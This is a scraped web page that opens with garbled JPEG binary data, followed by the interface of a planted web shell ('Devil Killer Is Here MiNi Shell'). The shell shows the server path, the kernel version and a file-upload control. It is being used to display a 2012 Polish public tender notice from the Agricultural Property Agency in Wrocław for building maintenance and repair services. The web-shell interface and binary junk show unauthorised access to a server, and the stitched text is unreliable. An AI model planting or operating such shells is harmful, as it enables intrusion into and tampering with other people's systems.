JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120217/49060-N-2012.html

<p class="kh_header"><b>Wrocław: Usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o. w budynkach mieszkalnych i o innym przeznaczeniu, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną administrowanych przez: 
Administrację Zasobu Własności Rolnej Skarbu Państwa w Świdnicy, Administrację Zasobu Własności Rolnej Skarbu Państwa we Wrocławiu, Administrację Zasobu Własności Rolnej Skarbu Państwa w Legnicy</b><br>
<b>Numer ogłoszenia: 49060 - 2012; data zamieszczenia: 17.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu , ul. Mińska 60, 54-610 Wrocław, woj. dolnośląskie, tel. 071 3563919, 3563862, 3563863, faks 071 3579097.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Osoba Prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o. w budynkach mieszkalnych i o innym przeznaczeniu, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną administrowanych przez: 
Administrację Zasobu Własności Rolnej Skarbu Państwa w Świdnicy, Administrację Zasobu Własności Rolnej Skarbu Państwa we Wrocławiu, Administrację Zasobu Własności Rolnej Skarbu Państwa w Legnicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie podzielono na 19 odrębnych części zamówienia (przedmiotów zamówienia).
Zamawiającym dla przedmiotów zamówienia od nr 1 do nr 5 jest Administracja Zasobu Własności Rolnej Skarbu Państwa w Świdnicy, z siedzibą przy ul. Kliczkowskiej 28, 58-100 Świdnica.
Zamawiającym dla przedmiotów zamówienia od nr 6 do nr 13 jest Administracja Zasobu Własności Rolnej Skarbu Państwa we Wrocławiu, z siedzibą przy 
ul. Mińskiej 60, 54-610 Wrocław .
Zamawiającym dla przedmiotów zamówienia od nr 14 do nr 19 jest Administracja Zasobu Własności Rolnej Skarbu Państwa w Legnicy, z siedzibą przy ul.Jaworzyńskiej 199, 59-220 Legnica.
1.1.	Przedmiotowe postępowanie prowadzone jest przez Agencję Nieruchomości Rolnych Oddział Terenowy we Wrocławiu na podstawie art.15 ust 2 ustawy PZP oraz udzielonych pełnomocnictw, w imieniu i na rzecz Administracji Zasobu Własności Rolnej Skarbu Państwa w: Świdnicy, Legnicy oraz Wrocławiu 
1.3	Przedmiotem zamówienia są usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o. w budynkach mieszkalnych i o innym przeznaczeniu, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną administrowanych przez: Administrację Zasobu Własności Rolnej Skarbu Państwa w Świdnicy, Administrację Zasobu Własności Rolnej Skarbu Państwa we Wrocławiu, Administrację Zasobu Własności Rolnej Skarbu Państwa w Legnicy. Zamówienie podzielono na 19 odrębnych części zamówienia (przedmiotów zamówienia).

Zakres prac do wykonania przez Wykonawcę:
1.2.1	 wykonanie konserwacji oraz drobnych napraw poszczególnych elementów budynków niezbędnych do utrzymania obiektu budowlanego i jego otoczenia w należytym stanie technicznym, obejmujące likwidację przyczyn mogących spowodować przedwczesne niszczenie obiektu lub jego elementów i urządzeń,
1.2.2	 niezwłoczne usuwanie awarii polegających na uszkodzeniu elementów budynku, obiektu małej architektury, instalacji lub urządzeń technicznych,
1.2.3	 usuwanie przyczyn i skutków awarii,
1.2.4	 wykonanie napraw i konserwacji instalacji budynkowych, centralnego ogrzewania, oraz instalacji grzewczych,
1.2.5	 wykonanie napraw elektrycznych i mechanicznych instalacji budynkowych,
1.2.5	 wykonanie konserwacji aparatury gazowej oraz napraw i konserwacji kotłów gazowych, zaworów i pomp,
1.2.6	 likwidacja przecieku na instalacji wodnej wewnętrznej od wodomierza głównego poprzez zatrzymanie dopływu wody do uszkodzonych instalacji (zamknięcie zaworów), a w przypadku braku możliwości zamknięcia, jednoczesna wymiana uszczelek, głowic lub założenie obejmy,
1.2.6	 udrożnienie instalacji wodociągowej, 
1.2.7	 likwidacja nieszczelności na sieci instalacji wodnej,
1.2.8	. usuwanie niedrożności sieci kanalizacyjnej pionowej w budynkach,
1.2.9	. czyszczenie pionów instalacji kanalizacyjnej, 
1.2.10	 czyszczenie i udrożnienie sieci kanalizacji sanitarnej,
1.2.11	 zamknięcie dopływu wody do budynku w przypadku niemożności udrożnienia, uszczelnienia instalacji kanalizacyjnej,
1.2.11	 naprawa lub wymiana instalacji elektrycznej wewnętrznej linii zasilającej w przypadku wystąpienia awarii,
1.2.12	. wymiana głównego zabezpieczenia w razie awarii,
1.2.13	. wymiana bezpieczników instalacyjnych w przypadku wystąpienia zwarcia,
1.2.14	 sprawdzenie i usunięcie awarii rozdzielni elektrycznej w przypadku wystąpienia,
1.2.15	 odpowietrzanie instalacji centralnego ogrzewania,
1.2.16	 naprawa drobnych awaryjnych pęknięć na instalacji centralnego ogrzewania lub odłączenie uszkodzonego odcinka,
1.2.17	. wymiana stycznika, czujnika oraz zabezpieczeń w tablicy rozdzielczej w hydroforni w przypadku wystąpienia.
Zakres usług oraz prawa i obowiązki Wykonawcy zostały zawarte są we wzorze umowy stanowiącym załącznik do SIWZ  
..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających w wysokości nie większej niż 50% wartości przedmiotowego zamówienia na podstawie art. 67 ust.1 pkt 6 ustawy Pzp,</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.71.10.00-2, 50.00.00.00-5, 50.80.00.00-3, 50.71.00.00-5, 50.72.00.00-8, 50.51.10.00-0, 50.51.20.00-7, 50.51.41.00-2, 50.53.11.00-7, 50.70.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> tak.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.1	Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.2.	Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.5.	Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.3.	Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za realizację usługi wraz z informacją na temat ich kwalifikacji zawodowych niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, wraz z oświadczeniem, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj.
-	co najmniej jedna osoba, która będzie uczestniczyć w realizacji zamówienia, posiada uprawnienia do kierowania robotami budowlanymi o specjalności konstrukcyjno - budowlanej lub instalacyjno-sanitarnej lub elektrycznej, wraz z oświadczeniem o posiadaniu ważnego zaświadczenia o przynależności do izby zawodowej
-	co najmniej jedna osoba posiada kwalifikacje murarza - tynkarza 
-	co najmniej jedna osoba posiada kwalifikację cieśli - stolarza 
-	co najmniej jedna osoba posiada kwalifikację dekarza - blacharza 
-	co najmniej jedna osoba posiada kwalifikację instalatora (hydraulika)
-	co najmniej jedna osoba posiada uprawnienia do eksploatacji instalacji elektrycznych i energetycznych z serii E
2.4.	W przypadku, gdy Wykonawca poda informacje o osobie, którą będzie dysponował, musi dołączyć do oferty pisemne zobowiązanie (oświadczenie) tej osoby lub innych podmiotów do udostępnienia osoby, która będzie uczestniczyć w wykonaniu zamówienia.
2.5.	Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.6.	Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej okoliczności wymienionej poniżej:
  1/ Zmiana terminu realizacji przedmiotu umowy.
      1.1. Zmiany spowodowane warunkami atmosferycznymi, w szczególności:
            a/ klęski żywiołowe,
            b/ udokumentowane warunki atmosferyczne, a w szczególności śnieżyce, nadmierne opady deszczu, huragany itp. uniemożliwiające realizację przedmiotu umowy i poszczególnego zlecenia.
      1.2. Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego:
            a/ wstrzymanie realizacji przedmiotu umowy przez Zamawiającego,
            b/ zmiany będące następstwem działań i decyzji organów administracji,                                a w szczególności wstrzymanie realizacji przedmiotu jako następstwo działań osób trzecich,
             c/ w przypadku protokolarnego przekazania nieruchomości na podstawie umowy sprzedaży lub nieodpłatnego przekazania nowemu nabywcy lub w przypadku przekazania obiektów innemu administratorowi lub dzierżawcy,
                   1.3. Zmiany będące następstwem zdarzeń losowych, o których niezwłocznie poinformowano Zamawiającego.
      1.4. W przypadku braku dostępu do lokalu z powodu nieobecności najemcy, bądź użytkownika, śmierci najemcy lub użytkownika, itp.
   2/ Zmiana wynagrodzenia:
      2.1. Zmniejszenie zakresu przedmiotu zamówienia niezależnego od Wykonawcy służące celowemu wydatkowania środków publicznych. W takim przypadku przewidywane jest proporcjonalne zmniejszenie wynagrodzenia umownego w stosunku do określonego w ofercie. 
      2.2. Zmniejszenie wynagrodzenia w przypadkach, o których mowa w pkt. 1.2. niniejszego paragrafu, będzie uzależnione od terminu realizacji przedmiotu umowy, a wartość będzie proporcjonalna do wartość umownej określonej w § 7 niniejszej umowy.
  3/ Zmiany pozostałe:
     3.1. zmiana danych związanych z obsługą administracyjno - organizacyjną umowy           (np. zmiana rachunku bankowego, umowy, zmiana adresu, zmiana nazwy administratora obiektów lub Wykonawcy),
     3.2. rozwiązanie umowy z terminem wypowiedzenia 30 dni w przypadku przekazania obiektów innemu administratorowi.
2. Powyższe postanowienia stanowią katalog zmian, na które Zamawiający dopuszcza zgodę, nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody przez Zamawiającego.
3. Nie stanowią zmian umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych, udzielanie zamówień dodatkowych określonych w przepisach o zamówieniach publicznych.
4. Zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności.
5. Zakazuje się zmian postanowień zawartej umowy oraz wprowadzania nowych postanowień umowy, niekorzystnych dla Zamawiającego, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty na podstawie, której dokonano wyboru Wykonawcy chyba, że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.
6. Wykonawca do czasu niezakończonych rozliczeń wynikających z realizacji umowy zobowiązany jest do informowania Zamawiającego o zmianach formy prawnej prowadzonej działalności gospodarczej, postępowaniu upadłościowym lub układowym oraz zmianie adresu siedziby firmy i zmianie adresu zamieszkania właściciela firmy, pod rygorem skutków prawnych zaniechania, w tym uznania za doręczoną korespondencję wysłaną na ostatni adres podany przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu, 54-610 Wrocław, 
ul. Mińska 60,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2012 godzina 11:00, miejsce: Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu, 54-610 Wrocław, 
ul. Mińska 60, kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiot 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o., w budynkach mieszkalnych i o innym przeznaczeniu, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną pozostających w administrowaniu AZWRSP w Świdnicy, zlokalizowanych na terenie powiatu dzierżoniowskiego zgodnie z zał. nr 1 do umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiot 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o., w budynkach mieszkalnych i o innym przeznaczeniu, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną pozostających w administrowaniu AZWRSP w Świdnicy, zlokalizowanych na terenie powiatu kłodzkiego zgodnie z zał. nr 2 do umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiot 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o., w budynkach mieszkalnych i o innym przeznaczeniu, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną pozostających w administrowaniu AZWRSP w Świdnicy, zlokalizowanych na terenie powiatu świdnickiego zgodnie z zał. nr 3 do umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przedmiot 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o., w budynkach mieszkalnych i o innym przeznaczeniu, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną pozostających w administrowaniu AZWRSP w Świdnicy, zlokalizowanych na terenie powiatu wałbrzyskiego zgodnie z zał. nr 4 do umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przedmiot 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o., w budynkach mieszkalnych i o innym przeznaczeniu, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną pozostających w administrowaniu AZWRSP w Świdnicy, zlokalizowanych na terenie powiatu ząbkowickiego zgodnie z zał. nr 5 do umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przedmiot 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi bieżące konserwacji, napraw i usuwania awarii w zakresie instalacji elektrycznych, sanitarnych, wod.-kan., c.o., w budynkach, lokalach mieszkalnych i użytkowych wraz z infrastrukturą techniczną pozostających w administrowaniu AZWRSP we Wrocławiu, zlokalizowanych na terenie powiatu oławskiego zgodnie z zał. nr 6 do umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przedmiot 7.</p>
